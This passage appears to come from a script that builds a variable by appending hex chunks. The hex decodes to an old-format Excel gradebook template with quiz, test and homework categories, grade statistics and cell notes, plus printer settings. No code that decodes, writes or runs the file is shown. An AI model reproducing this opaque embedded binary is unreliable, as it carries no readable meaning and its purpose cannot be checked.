10000ff7f9001000000020000050141007200690061006c0031001a00bd010"\r\nwD+="000ff7f9001000000000000050141007200690061006c0031001a00bd010000ff7f90010000"\r\nwD+="00000000050141007200690061006c0031001a00c80001000a00bc020000000200000501410"\r\nwD+="07200690061006c0031001a00a0000000ff7f9001000000020000050141007200690061006c"\r\nwD+="0031001a00c80000000a009001000000020000050141007200690061006c0031001a00c8000"\r\nwD+="0000c009001000000020000050141007200690061006c0031001a00c8000100ff7fbc020000"\r\nwD+="00020000050141007200690061006c0031001a00c80001000900bc020000000200000501410"\r\nwD+="07200690061006c001e041c000500170000222422232c2323305f293b5c28222422232c2323"\r\nwD+="305c291e04210006001c0000222422232c2323305f293b5b5265645d5c28222422232c23233"\r\nwD+="05c291e04220007001d0000222422232c2323302e30305f293b5c28222422232c2323302e30"\r\nwD+="305c291e0427000800220000222422232c2323302e30305f293b5b5265645d5c28222422232"\r\nwD+="c2323302e30305c291e0437002a003200005f282224222a20232c2323305f293b5f28222422"\r\nwD+="2a205c28232c2323305c293b5f282224222a20222d225f293b5f28405f291e042e002900290"\r\nwD+="0005f282a20232c2323305f293b5f282a205c28232c2323305c293b5f282a20222d225f293b"\r\nwD+="5f28405f291e043f002c003a00005f282224222a20232c2323302e30305f293b5f282224222"\r\nwD+="a205c28232c2323302e30305c293b5f282224222a20222d223f3f5f293b5f28405f291e0436"\r\nwD+="002b003100005f282a20232c2323302e30305f293b5f282a205c28232c2323302e30305c293"\r\nwD+="b5f282a20222d223f3f5f293b5f28405f291e040b00a400060000302e303030301e040a00a5"\r\nwD+="00050000302e3030301e040800a600030000302e30e000140000000000f5ff2000000000000"\r\nwD+="00000000000c020e000140001000000f5ff200000f40000000000000000c020e00014000100"\r\nwD+="0000f5ff200000f40000000000000000c020e000140002000000f5ff200000f400000000000"\r\nwD+="00000c020e000140002000000f5ff200000f40000000000000000c020e000140000000000f5"\r\nwD+="ff200000f40000000000000000c020e000140000000000f5ff200000f40000000000000000c"\r\nwD+="020e000140000000000f5ff200000f40000000000000000c020e000140000000000f5ff2000"\r\nwD+="00f40000000000000000c020e000140000000000f5ff200000f40000000000000000c020e00"\r\nwD+="0140000000000f5ff200000f40000000000000000c020e000140000000000f5ff200000f400"\r\nwD+="00000000000000c020e000140000000000f5ff200000f40000000000000000c020e00014000"\r\nwD+="0000000f5ff200000f40000000000000000c020e000140000000000f5ff200000f400000000"\r\nwD+="00000000c020e0001400000000000100200000000000000000000000c020e000140001002b0"\r\nwD+="0f5ff200000f80000000000000000c020e000140001002900f5ff200000f800000000000000"\r\nwD+="00c020e000140001002c00f5ff200000f80000000000000000c020e000140001002a00f5ff2"\r\nwD+="00000f80000000000000000c020e000140007000000f4ff000000f40000000000000000c020"\r\nwD+="e000140006000000f4ff000000f40000000000000000c020e000140001000900f5ff200000f"\r\nwD+="80000000000000000c020e0001400000001000100200000040000000000000000c020e00014"\r\nwD+="000000000001002000006011114020402000040d20e00014000000010001002000006411114"\r\nwD+="020402000040d20e00014000000000001002000006011114020402000040f20e00014000000"\r\nwD+="010001002000006411114020402000040f20e00014000f00000001002000006811114020402"\r\nwD+="000041620e00014000f00010001002000006c11114020402000041620e00014000000000001"\r\nwD+="00200000201111402040200000c020e00014000000000001002000006011114020402000041"\r\nwD+="620e00014001400000001002000006811114020402000040a20e00014000f00000001002000"\r\nwD+="00080000000000000000c0eeee001400130000000100200000080000000000000000c020e00"\r\nwD+="01400000000000000200000e011114020402000040f20e0001400000000000000200000e011"\r\nwD+="114020402000040d20e0001400000000000000200000800000000000000000c020e00014000"\r\nwD+="00001000000200000840000000000000000c020e0001400140001000000200000ec11114020"\r\nwD+="402000040a2093020400108003ff93020400118006ff93020400128004ff93020400138007f"\r\nwD+="f93020400148009ff93020400158008ff93020400008000ff93020400168005ff6001020000"\r\nwD+="0085000b00c710000000000300616c6c85000a003a22000000000200637785000a00893f000"\r\nwD+="000000200687785000c0010580000000004007175697a85000c006764000000000400746573"\r\nwD+="7485000c00ac6f00000000040073746174850011001e80000000000900646576696174696f6"\r\nwD+="e8500110029830000000009006176672067726170688c00040001000100ae01040008000104"\r\nwD+="170020000500000001000100000002000200000003000300000004000400000000000000180"\r\nwD+="01b00210000010b000000010000000000000d3b040001001f000100010018001b0021000001"\r\nwD+="0b000000020000000000000d3b000001001f000100010018001b00210000010b00000003000"\r\nwD+="0000000000d3b010001001f000100010018001b00210000010b000000040000000000000d3b"\r\nwD+="020001001f000100010018001b00210000010b000000050000000000000d3b030001001f000"\r\nwD+="1000100c1010800c1010000548d0100eb0082000f0000f07a000000000006f040000000011c"\r\nwD+="000007000000180000000600000002000000050000000300000004000000040000000300000"\r\nwD+="00500000002000000010000000b000000060000000600000033000bf012000000bf00080008"\r\nwD+="00810141000008c0014000000840001ef1100000000b0000080c00000817000008f7000010f"\r\nwD+="c002f059d010000660000000400005441534b08000043415445474f52590500004752414445"\r\nwD+="160000312f32392c20333020502e203439322c2050203530320d0000382e3620382e3720736"\r\nwD+="86565741f0000312f3330205175697a2032206f6e20726174657320616e6420726174696f73"\r\nwD+="130000312f333120322f312043682054657374204120120000322f312c3220702e203531362"\r\nwD+="02d203531381400006368203720616e642037206e746220636865636b080000686f6d65776f"\r\nwD+="726b090000636c617373776f726b0400007175697a0400007465737418000073696d696c617"\r\nwD+="220747269616e676c6573207061636b65740900006368203820746573740f000070726f6a65"\r\nwD+="6374206f75746c696e650c0000636f6f6c20646f776e20233511000070726f6772657373207"\r\nwD+="3686565742023371000007765656b6c79207265766965772031351000007765656b6c792072"\r\nwD+="6576696577203136110000547269676f6e6f6d657472792054657374140000322f362c20372"\r\nwD+="0702e203739392023312d323520100000702e203533312035333820322f382c39170000392e"\r\nwD+="3320392e34207079746861676f7265616e2074686d1000007765656b6c79207265766965772"\r\nwD+="031340d000054726967205477697374657220130000322f32372c3238204d61746820412074"\r\nwD+="657374150000332f312c3220776b7368742031302e312f31302e361000007765656b6c79207"\r\nwD+="26576696577203137140000547269676f6e6f6d657472792050726f6a6563740c00006c6f63"\r\nwD+="7573207061636b65740b0000436972636c65207175697a1f0000332f372c382031312e31206"\r\nwD+="e6f74657320616e6420707261632041207368740d000050415254494349504154494f4e0d00"\r\nwD+="0070617274696369706174696f6e0900007761726d75702023350d000050617274696369706"\r\nwD+="174696f6e090000436c617373776f726b080000486f6d65776f726b0500005175697a200400"\r\nwD+="00546573740d000046696e616c20617665726167650600006f7574206f66060000677261706"\r\nwD+="820050000477261646508000053747564656e74731900004879706f746865746963616c2063"\r\nwD+="6c617373206772616465730400006d65616e0700006d656469616e200400006d6f646506000"\r\nwD+="06d656469616e08000057656967687465640800004176657261676573080000526567756c61"\r\nwD+="722008000043617465676f72790400005175697a160000496e73657274207175697a2067726"\r\nwD+="170682068657265160000496e73657274207465737420677261706820686572650500005465"\r\nwD+="7374200d00003f20496e73657274206865726504000050757420050000796f7572200300006"\r\nwD+="f662009000063617465676f7279200800006176657261676573050000686572652004000028"\r\nwD+="6e6f74090000776569676874656420080000617665726167652908000063772067726164650"\r\nwD+="a000046696e616c204176672e0400004d65616e08000056617269616e636508000053742e20"\r\nwD+="4465762e0700005a2d53636f72650600004d656469616e03000056617205000053744465760"\r\nwD+="600005a73636f72650300004d656405000074686973200500007061737465040000616c6c20"\r\nwD+="060000677261646573040000686572650500006a757374200700006e756d626572730700006"\r\nwD+="66967757265200400006f757420040000686f7720030000746f20040000736f727406000073"\r\nwD+="742064657608000076617269616e63650700007a2d73636f726505000070616765200500007"\r\nwD+="7696c6c20070000616e7377657220020000612007000070726f6a6563740c00007072657365"\r\nwD+="6e746174696f6e0800007175657374696f6eff006a000800150b00000c000000a50b00009c0"\r\nwD+="000001a0c000011010000bb0c0000b2010000530d00004a020000d00d0000c70200002f0e00"\r\nwD+="00260300007c0e000073030000e70e0000de030000370f00002e0400007d0f000074040000c"\r\nwD+="00f0000b704000001100000f804000063081500630800000000000000000000150000000002"\r\nwD+="0000d20a0000000908100000061000e228cd07c9c00000060200000b0214000000000000000"\r\nwD+="0002000000095110000021c00000d00020001000c00020064000f0002000100110002000000"\r\nwD+="10000800fca9f1d24d62503f5f00020001002a00020000002b0002000000820002000100800"\r\nwD+="008000000000000000000250204000000ff0081000200c10414000000150000008300020000"\r\nwD+="00840002000000a10022000000ff00010001000100040000000000000000000000e03f00000"\r\nwD+="0000000e03f0000120002000100dd00020001006300020001005500020008007d000c000000"\r\nwD+="0000db1f0f00020004007d000c0001000100b60d0f00020004007d000c000300030049030f0"\r\nwD+="0020004007d000c0004000400b60d0f00060004009d000200010000020e0000000000200000"\r\nwD+="0000000900000008021000000000000900ff000000000000010f0008021000010000000900f"\r\nwD+="f000000000000010f0008021000020000000900ff000000000000010f000802100003000000"\r\nwD+="0900ff000000000000010f0008021000040000000900ff000000000000010f0008021000050"\r\nwD+="000000900ff000000000000010f0008021000060000000900ff000000000000010f00080210"\r\nwD+="00070000000900ff000000000000010f0008021000080000000900ff000000000000010f000"\r\nwD+="8021000090000000900ff000000000000010f00080210000a0000000900ff00000000000001"\r\nwD+="0f00080210000b0000000900ff000000000000010f00080210000c0000000900ff000000000"\r\nwD+="000010f00080210000d0000000900ff000000000000010f00080210000e0000000900ff0000"\r\nwD+="00000000010f00080210000f0000000900ff000000000000010f0008021000100000000900f"\r\nwD+="f000000000000010f0008021000110000000900ff000000000000010f000802100012000000"\r\nwD+="0900ff000000000000010f0008021000130000000900ff000000000000010f0008021000140"\r\nwD+="000000900ff000000000000010f0008021000150000000900ff000000000000010f00080210"\r\nwD+="00160000000900ff000000000000010f0008021000170000000900ff000000000000010f000"\r\nwD+="8021000180000000900ff000000000000010f0008021000190000000900ff00000000000001"\r\nwD+="0f00080210001a0000000900ff000000000000010f00080210001b0000000900ff000000000"\r\nwD+="000010f00080210001c0000000900ff000000000000010f00080210001d0000000900ff0000"\r\nwD+="00000000010f00080210001e0000000900ff000000000000010f00080210001f0000000900f"\r\nwD+="f000000000000010f00fd000a00000004001a0033000000fd000a00000005001a0034000000"\r\nwD+="fd000a00010000000f0000000000fd000a00010001000f0001000000fd000a00010002000f0"\r\nwD+="002000000fd000a00010004001a0024000000fd000a00010005001a0025000000fd000a0001"\r\nwD+="0006001a0026000000fd000a00010007001a0027000000fd000a00010008001a0028000000f"\r\nwD+="d000a00020000000f0021000000fd000a00020001000f00220000007e020a00020002000f00"\r\nwD+="000059400600290002000400230000000000000024400000020007ff130024020002c042010"\r\nwD+="5001f9a9999999999b93f05bd001200020005001b00000028401b0000003440060006003800"\r\nwD+="020007001b000000000000002b400000020008ff220024050002c024090002c0240b0002c02"\r\nwD+="41d0002c0420405001f9a9999999999c93f0506003d00020008001b006766666666662c4000"\r\nwD+="00070004ff270024080002c0240a0002c024110002c0241a0002c0241b0002c0420505001f9"\r\nwD+="a9999999999c93f05fd000a00030000000f0003000000fd000a00030001000f00090000007e"\r\nwD+="020a00030002000f0000005940fd000a00040000000f0004000000fd000a00040001000f000"\r\nwD+="a0000007e020a00040002000f0000005940fd000a00050000000f0005000000fd000a000500"\r\nwD+="01000f000b0000007e020a00050002000f0000004940fd000a00060000000f0006000000fd0"\r\nwD+="00a00060001000f00090000007e020a00060002000f0000c05040fd000a00060004001c0029"\r\nwD+="000000fd000a00070000000f0007000000fd000a00070001000f00090000007e020a0007000"\r\nwD+="2000f000000444006003300070004001d00cdcccccccc6c51400000580337fd1d0044020004"\r\nwD+="c044020005c00344020006c00344020007c00344020008c003fd000a00080000000f0008000"\r\nwD+="000fd000a00080001000f000c0000007e020a00080002000f0000004940fd000a0009000000"\r\nwD+="0f000d000000fd000a00090001000f000b0000007e020a00090002000f0000005440fd000a0"\r\nwD+="00a0000000f000e000000fd000a000a0001000f000c0000007e020a000a0002000f00008051"\r\nwD+="40fd000a000b0000000f0011000000fd000a000b0001000f000b0000007e020a000b0002000"\r\nwD+="f0000005940fd000a000c0000000f000f000000fd000a000c0001000f00090000007e020a00"\r\nwD+="0c0002000f0000005940fd000a000d0000000f0023000000fd000a000d0001000f000a00000"\r\nwD+="07e020a000d0002000f0000003440fd000a000e0000000f0010000000fd000a000e0001000f"\r\nwD+="000a0000007e020a000e0002000f0000004940fd000a000f0000000f0012000000fd000a000"\r\nwD+="f0001000f000a0000007e020a000f0002000f0000004940fd000a000f000400180035000000"\r\nwD+="fd000a000f000500180036000000fd000a000f000600180034000000fd000a00100000000f0"\r\nwD+="013000000fd000a00100001000f000a0000007e020a00100002000f0000003440fd000a0010"\r\nwD+="000400180024000000fd000a0010000500180025000000fd000a0010000600180026000000f"\r\nwD+="d000a0010000700180037000000fd000a0010000800180028000000fd000a00110000000f00"\r\nwD+="14000000fd000a00110001000f000c0000007e020a00110002000f0000c0524006001f00110"\r\nwD+="00400240000000000000059400000020004ff090024020002c042010500bd00120011000500"\r\nwD+="190000004f40190000005140060006002e001100070019000000000000e050400000110004f"\r\nwD+="f180024050002c024090002c0240b0002c0241d0002c0420405000600330011000800180000"\r\nwD+="00000000c051400000110007fe1d0024080002c0240a0002c024110002c0241a0002c0241b0"\r\nwD+="002c042050500fd000a00120000000f0015000000fd000a00120001000f00090000007e020a"\r\nwD+="00120002000f0000005940fd000a00130000000f0016000000fd000a00130001000f0009000"\r\nwD+="0007e020a00130002000f0000000000fd000a00140000000f0017000000fd000a0014000100"\r\nwD+="0f00090000007e020a00140002000f0000000000fd000a00150000000f0018000000fd000a0"\r\nwD+="0150001000f000a0000007e020a00150002000f0000005940fd000a00160000000f00190000"\r\nwD+="00fd000a00160001000f000a0000007e020a00160002000f0000005440fd000a00170000000"\r\nwD+="f001a000000fd000a00170001000f00090000007e020a00170002000f0000005940fd000a00"\r\nwD+="180000000f001b000000fd000a00180001000f00090000007e020a00180002000f000000000"\r\nwD+="0fd000a00190000000f001c000000fd000a00190001000f000a0000007e020a00190002000f"\r\nwD+="0000000000fd000a001a0000000f001d000000fd000a001a0001000f000c0000007e020a001"\r\nwD+="a0002000f0000005440fd000a001b0000000f001d000000fd000a001b0001000f000c000000"\r\nwD+="7e020a001b0002000f0000005440fd000a001c0000000f001e000000fd000a001c0001000f0"\r\nwD+="0090000007e020a001c0002000f0000005940fd000a001d0000000f001f000000fd000a001d"\r\nwD+="0001000f000b0000007e020a001d0002000f0000004440fd000a001e0000000f0020000000f"\r\nwD+="d000a001e0001000f00090000007e020a001e0002000f0000005940fd000a001f0000000f00"\r\nwD+="1e000000fd000a001f0001000f000a0000007e020a001f0002000f0000805640d70044000f0"\r\nwD+="a00006c021c007000ea002a002a002a00380061002a002a002a002a002a002a002a00540070"\r\nwD+="00cc002a002a002a002a002a002a002a002a002a002a002a002a002a00c20118000e0007000"\r\nwD+="6000904040000801100110001000907080007feec00aa000f0002f038030000100008f00800"\r\nwD+="0000060000000a1400000f0003f0f80200000f0004f028000000010009f0100000000000000"\r\nwD+="000000000000000000000000002000af00800000000140000050000000f0004f05200000092"\r\nwD+="0c0af00800000001140000000a000043000bf0180000007f0004010401bf0008000800ff010"\r\nwD+="0000800bf0300000200000010f0120000000100010000000100000002000000020000000000"\r\nwD+="11f0000000005d0046001500120014000100012100000000dc089201000000000c001400000"\r\nwD+="0000000000000000001000b000000100000001300ee1f00000b000400010300000200140057"\r\nwD+="0000000000ec0078000f0004f078000000f2030af00800000004140000000a000093000bf03"\r\nwD+="60000008000503236018500010000008b0002000000bf0008000a0047014f05000048012660"\r\nwD+="0000810141000008c001400000087f0300000c00000010f0120000000000000077000200d30"\r\nwD+="0000008030c00f100000011f0000000005d001a00150012001e000400116050323601a80992"\r\nwD+="010000000000000000ec00080000000df000000000b60112001202000000000000000068001"\r\nwD+="000000000003c00690000456e74657220796f7572206e6577207461736b7320686572652e20"\r\nwD+="20596f75206d617920757365207468697320736865657420746f2068656c7020796f752e202"\r\nwD+="04f70656e207468697320646f63756d656e7420616e64206368616e67652074686520696e66"\r\nwD+="6f2e3c001000000000006c0211006800000000000000ec0078000f0004f078000000e2030af"\r\nwD+="00800000005140000000a000093000bf0360000008000a03236018500010000008b00020000"\r\nwD+="00bf0008000a00470155b5ffff480119d5ffff810141000008c001400000087f0300000c000"\r\nwD+="00010f01200000000000600d001040088000800e00008000000000011f0000000005d001a00"\r\nwD+="150012001e0005001160a0323601e40a92010000000000000000ec00080000000df00000000"\r\nwD+="0b60112001202000000000000000029001000000000003c002a0000436c69636b2074686520"\r\nwD+="63656c6c20616e6420636865636b206f75742074686520666f726d756c612e3c00100000000"\r\nwD+="000e90011002900000000000000ec006c000f0004f06c000000c2000af00800000006140000"\r\nwD+="000a000073000bf02a0000008000f03236018500010000008b0002000000bf0008000a00810"\r\nwD+="10d000008bf0110001000c00140000008000010f012000000000004008b001300d3000800b0"\r\nwD+="0120005a00000011f0000000005d001a00150012001e0006001160f0323601d80b920100000"\r\nwD+="00000000000ec00080000000df000000000b6011200120200000000000000003e0010000000"\r\nwD+="00003c003f0000496e7365727420746865206772617068206f6620746869732064617461206"\r\nwD+="f6e2061206e65772073686565742e202053656520646972656374696f6e732e3c0010000000"\r\nwD+="00005d0111003e00000000000000ec00fa000f0004f0f200000002000af0080000000a14000"\r\nwD+="0000a0000b3000bf0b8000000bf000800080042011e01000043013a00000044010400000045"\r\nwD+="c14c00000046c1240000007f0101000100810141000008bf0100001000c00140000008ff011"\r\nwD+="000100013001300f0ff000000000c001a00180034002d003500420036006e000b007c000700"\r\nwD+="8a0003007a001f0080001f0086001f008f0002009e000600ad000a00c6003a00db003a00f00"\r\nwD+="03a0014010e001e0106000f0010000200004000ad012000ad012000ad012000ad012000ad01"\r\nwD+="2000ad012000ac0080000010f012000000000004000b0012005a00080050031500c40000001"\r\nwD+="1f0000000005d001a00150012001e000a00116000000000bc0c92010000000000000000ec00"\r\nwD+="28002f0005f020000000000017f0080000000200000004140000000017f0080000000400000"\r\nwD+="0051400003e021200b606000000004000000000000000000000001d000f0003020004000000"\r\nwD+="0100020002000404ef00060005003700000067081700670800000000000000000000020001f"\r\nwD+="fffffff004000000a0000000908100000061000e228cd07c9c00000060200000b0218000000"\r\nwD+="000001000000290000000c230000cb2f00002f3000000d00020001000c00020064000f00020"\r\nwD+="0010011000200000010000800fca9f1d24d62503f5f00020001002a00020000002b00020000"\r\nwD+="00820002000100800008000000000000000000250204000000ff0081000200c104140000001"\r\nwD+="5000000830002000000840002000000a10022000000ff000100010001000400020001ff0000"\r\nwD+="00000000e03f000000000000e03f0400120002000100dd00020001006300020001005500020"\r\nwD+="008007d000c0000000000b6170f00020004007d000c0001000100920f0f00020004007d000c"\r\nwD+="0008000800db0b0f00060004007d000c000d000d00b60a0f00060004009b0000009d0002000"\r\nwD+="1009e00220000000400060218433601090100000000000000000000000000636c617373776f"\r\nwD+="726b00020e00010000002900000000000e00000008021000010000000a00ff0000000000000"\r\nwD+="10f0008021000020000000a00ff000000000020010f0008021000030000000a00ff00000000"\r\nwD+="0020010f0008021000040000000a00ff000000000000010f0008021000050000000a00ff000"\r\nwD+="000000020010f0008021000060000000a00ff000000000020010f0008021000070000000a00"\r\nwD+="ff000000000020010f0008021000080000000a00ff000000000020010f00080210000900000"\r\nwD+="00a00ff000000000020010f00080210000a0000000a00ff000000000020010f00080210000b"\r\nwD+="0000000a00ff000000000020010f00080210000c0000000a00ff000000000020010f0008021"\r\nwD+="0000d0000000a00ff000000000000010f00080210000e0000000a00ff000000000000010f00"\r\nwD+="080210000f0000000a00ff000000000000010f0008021000100000000800ff0000000000000"\r\nwD+="10f0008021000110000000800ff000000000020010f0008021000120000000800ff00000000"\r\nwD+="0020010f0008021000130000000800ff000000000020010f0008021000140000000800ff000"\r\nwD+="000000020010f0008021000150000000800ff000000000000010f0008021000160000000800"\r\nwD+="ff000000000000010f0008021000170000000800ff000000000020010f00080210001800000"\r\nwD+="00800ff000000000020010f0008021000190000000800ff000000000000010f00080210001a"\r\nwD+="0000000800ff000000000020010f00080210001b0000000800ff000000000020010f0008021"\r\nwD+="0001c0000000800ff000000000020010f00080210001d0000000800ff000000000020010f00"\r\nwD+="080210001e0000000800ff000000000020010f00080210001f0000000800ff0000000000000"\r\nwD+="10f00fd000a00010000000f0000000000fd000a00010001000f0001000000fd000a00010002"\r\nwD+="000f0002000000fd000a00010003000f004b000000fd000a00010004000f0047000000fd000"\r\nwD+="a00010005000f0048000000fd000a00010006000f0049000000fd000a00010007000f004a00"\r\nwD+="0000fd000a00010008000f0029000000fd000a00020000000f0021000000fd000a000200010"\r\nwD+="00f00220000007e020a00020002000f000000594003020e0002000800170014b742712b1451"\r\nwD+="4003020e0002000900170014b742712b145140fd000a00030000000f0003000000fd000a000"\r\nwD+="30001000f00090000007e020a00030002000f0000005940fd000a00030008000f0029000000"\r\nwD+="fd000a00030009000f0029000000fd000a00040000000f0004000000fd000a00040001000f0"\r\nwD+="00a0000007e020a0004000200250000004b40060047000400030025000000000000004b4020"\r\nwD+="001f0007fe310024040002c0240d0002c0240e0002c0240f0002c024100002c024150002c02"\r\nwD+="4160002c024190002c0241f0002c04209e300060047000400040026009ff4499ff4494c4020"\r\nwD+="00040006ff310024040002c0240d0002c0240e0002c0240f0002c024100002c024150002c02"\r\nwD+="4160002c024190002c0241f0002c04209050006004700040005002500f46ae259d16c954020"\r\nwD+="000f0008ff310024040002c0240d0002c0240e0002c0240f0002c024100002c024150002c02"\r\nwD+="4160002c024190002c0241f0002c042092e000600470004000600250055db59c2cf83424020"\r\nwD+="00040007ff310024040002c0240d0002c0240e0002c0240f0002c024100002c024150002c02"\r\nwD+="4160002c024190002c0241f0002c042090c000600280004000700250047c9462533d2b1bf20"\r\nwD+="00040005ff120044040002c044040004c0041544040006c0067e020a0004000800170000805"\r\nwD+="14001020600040009001700fd000a00050000000f0005000000fd000a00050001000f000b00"\r\nwD+="00007e020a00050002000f0000004940fd000a00060000000f0006000000fd000a000600010"\r\nwD+="00f00090000007e020a00060002000f0000c05040fd000a00070000000f0007000000fd000a"\r\nwD+="00070001000f00090000007e020a00070002000f0000004440fd000a00080000000f0008000"\r\nwD+="000fd000a00080001000f000c0000007e020a00080002000f0000004940fd000a0009000000"\r\nwD+="0f000d000000fd000a00090001000f000b0000007e020a00090002000f0000005440fd000a0"\r\nwD+="00a0000000f000e000000fd000a000a0001000f000c0000007e020a000a0002000f00008051"\r\nwD+="40fd000a000b0000000f0011000000fd000a000b0001000f000b0000007e020a000b0002000"\r\nwD+="f0000005940fd000a000c0000000f000f000000fd000a000c0001000f00090000007e020a00"\r\nwD+="0c0002000f0000005940fd000a000d0000000f0023000000fd000a000d0001000f000a00000"\r\nwD+="07e020a000d0002000f00000034407e020a000d0004000f0000004f4003020e000d0006000f"\r\nwD+="0043e7357689da4340060028000d0007000f00410b953b80ecf0bf0000040004ff1200440d0"\r\nwD+="002c0440d0004c00415440d0006c006fd000a000e0000000f0010000000fd000a000e000100"\r\nwD+="0f000a0000007e020a000e0002000f00000049407e020a000e0004000f0000004f4003020e0"\r\nwD+="00e0006000f0043e7357689da4340060028000e0007000f00937af3fa6d57d3bf00000d0007"\r\nwD+="ff1200440e0002c0440e0004c00415440e0006c006fd000a000e0008001e0045000000fd000"\r\nwD+="a000e0009001e002a000000fd000a000f0000000f0012000000fd000a000f0001000f000a00"\r\nwD+="00007e020a000f0002000f000198c2407e020a000f0004000f0000004f4003020e000f00060"\r\nwD+="00f0043e7357689da4340060028000f0007000f00f7cfd0457ac1ea3f00000e0007ff120044"\r\nwD+="0f0002c0440f0004c00415440f0006c006060023000f0008001b00cdcccccccccc284000003"\r\nwD+="00637fd0d001fd7a3703d0ad7e33f1e1400057e020a000f0009001f0000003440fd000a0010"\r\nwD+="0000000f0013000000fd000a00100001000f000a0000007e020a00100002000f00000034407"\r\nwD+="e020a00100004000f0000004f4003020e00100006000f0043e7357689da4340060028001000"\r\nwD+="07000f00410b953b80ecf0bf00000f0007ff120044100002c044100004c0041544100006c00"\r\nwD+="6fd000a00110000000f0014000000fd000a00110001000f000c0000007e020a00110002000f"\r\nwD+="0000c05240fd000a00120000000f0015000000fd000a00120001000f00090000007e020a001"\r\nwD+="20002000f0000005940fd000a00130000000f0016000000fd000a00130001000f0009000000"\r\nwD+="7e020a00130002000f0000000000fd000a00140000000f0017000000fd000a00140001000f0"\r\nwD+="0090000007e020a00140002000f0000000000fd000a00150000000f0018000000fd000a0015"\r\nwD+="0001000f000a0000007e020a00150002000f00000059407e020a00150004000f0000004f400"\r\nwD+="3020e00150006000f0043e7357689da434006002800150007000f0014820178c39fee3f0000"\r\nwD+="100007ff120044150002c044150004c0041544150006c006fd000a00160000000f001900000"\r\nwD+="0fd000a00160001000f000a0000007e020a00160002000f00000054407e020a00160004000f"\r\nwD+="0000004f4003020e00160006000f0043e7357689da434006002800160007000f00dd376df82"\r\nwD+="403dd3f0000150007ff120044160002c044160004c0041544160006c006fd000a0017000000"\r\nwD+="0f001a000000fd000a00170001000f00090000007e020a00170002000f0000005940fd000a0"\r\nwD+="0180000000f001b000000fd000a00180001000f00090000007e020a00180002000f00000000"\r\nwD+="00fd000a00190000000f001c000000fd000a00190001000f000a0000007e020a00190002000"\r\nwD+="f00000000007e020a00190004000f0000004f4003020e00190006000f0043e7357689da4340"\r\nwD+="06002800190007000f00537e7ab998fbf8bf0000160007ff120044190002c044190004c0041"\r\nwD+="544190006c006fd000a001a0000000f001d000000fd000a001a0001000f000c0000007e020a"\r\nwD+="001a0002000f0000005440fd000a001b0000000f001d000000fd000a001b0001000f000c000"\r\nwD+="0007e020a001b0002000f0000005440fd000a001c0000000f001e000000fd000a001c000100"\r\nwD+="0f00090000007e020a001c0002000f0000005940fd000a001d0000000f001f000000fd000a0"\r\nwD+="01d0001000f000b0000007e020a001d0002000f0000004440fd000a001e0000000f00200000"\r\nwD+="00fd000a001e0001000f00090000007e020a001e0002000f0000005940fd000a001f0000000"\r\nwD+="f001e000000fd000a001f0001000f000a0000007e020a001f0002000f00008056407e020a00"\r\nwD+="1f0004000f0000004f4003020e001f0006000f0043e7357689da4340060028001f0007000f0"\r\nwD+="0010f1cfaaa90e63f0000190007ff1200441f0002c0441f0004c00415441f0006c006d70042"\r\nwD+="00370c000058027e004e0046009a012a002a002a002a002a002a002a002a0076009200ab007"\r\nwD+="6002a002a002a002a00760076002a002a0076002a002a002a002a002a000802100028000d00"\r\nwD+="0e00ff000000000000010f000102060028000d001700d70006001e0000000000c20118001f0"\r\nwD+="00400020009070300010f08000f0005000903080007ffec00aa000f0002f03e020000200008"\r\nwD+="f00800000005000000040400000f0003f00e0200000f0004f028000000010009f0100000000"\r\nwD+="000000000000000000000000000000002000af00800000000040000050000000f0004f05200"\r\nwD+="0000920c0af00800000001040000000a000043000bf0180000007f0004010401bf000800080"\r\nwD+="0ff0100000800bf0300000200000010f0120000000100010000000100000002000000020000"\r\nwD+="00000011f0000000005d00460015001200140001000121000000006c129201000000000c001"\r\nwD+="40000000000000000000000010008000000100000001300ee1f000008000400010300000a00"\r\nwD+="1400570000000000ec0072000f0004f06a000000920c0af00800000002040000000a0000830"\r\nwD+="00bf0300000007f0004010401bf000800080081014e00000883014d000008bf0110001000c0"\r\nwD+="014d000008ff01080008003f0200000200000010f012000000000000004101210000000c00a"\r\nwD+="0023700d300000011f0000000005d001a001500120005000200116000000000381392010000"\r\nwD+="0000000000000908100000062000e228cd07c9c000000602000014000000150000008300020"\r\nwD+="000008400020000004d006a0300004500700073006f006e0020005300740079006c00750073"\r\nwD+="00200043004f004c004f005200200036003000300020004500530043002f005000200032000"\r\nwD+="000000001040005dc008c0243ef800702000100ea0a6f08640001000f006801020001006801"\r\nwD+="020001004c00650074007400650072000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000100000000000000020000000200000001000000300100000000000000000"\r\nwD+="000000000000000000044494e55220000003402580053ab1e3f000000000000000000000000"\r\nwD+="010000000000000000000000000000000800000001000000010000000000020000000400000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000dddd00000000000000000000000000000000000000000000000000000"\r\nwD+="0000000000000000000000580000004f5350454141828202000000000000000100000000000"\r\nwD+="000000000000000000000000000010000000000000004000000000000000000000000000000"\r\nwD+="000000006a0000000000000003000000010000000f000000a10022000100640001000100010"\r\nwD+="0000068016801000000000000e03f000000000000e03f010033000200030060100a00802535"\r\nwD+="16dc000100090060100a008115e60ac80000000a0060100a008115e60ac80001000b0012000"\r\nwD+="2000100011002000000021010000000000000000000d0bfb502e8bf230133100000a0000400"\r\nwD+="0100010064100800000001000000010032100400000002003310000007100c0000000000000"\r\nwD+="0ffff09004d000a101000ffffff0000000000010001004e004d003410000003100c00030001"\r\nwD+="000c000900010000003310000051100f0000020000000007003a0000010002000d100e00000"\r\nwD+="0050147005200410044004500511013000102000000000b003b000002001f00020002005110"\r\nwD+="13000202000000000b003b000002001f000000010051100800030100000000000006100800f"\r\nwD+="fff000000000000331000005f10020000003410000045100200000034100000441004000a00"\r\nwD+="0000241002000200251020000202010000000000eaffffffcbffffff0000000000000000b1